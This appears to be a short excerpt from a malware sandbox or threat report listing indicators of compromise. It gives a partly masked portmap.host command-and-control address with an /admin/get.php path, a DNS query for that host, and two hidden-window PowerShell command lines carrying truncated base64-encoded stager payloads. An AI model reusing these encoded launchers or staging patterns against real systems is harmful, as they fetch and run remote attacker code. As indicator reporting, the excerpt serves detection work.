Technical information
- http://an#######9.portmap.host:8080/admin/get.php via an#####609.portmap.host
- DNS ASK an#####609.portmap.host
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBMAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJAA2ADgANgA2AD0AWwBSAGUARgBdAC4AQQBzAHMAZQBtAGIATAB5AC4ARwBl...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBMAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJAA2ADgANgA2AD0AWwBSAGUARgBdAC4AQQBzAHMAZQBtAGIATAB5AC4ARwBl...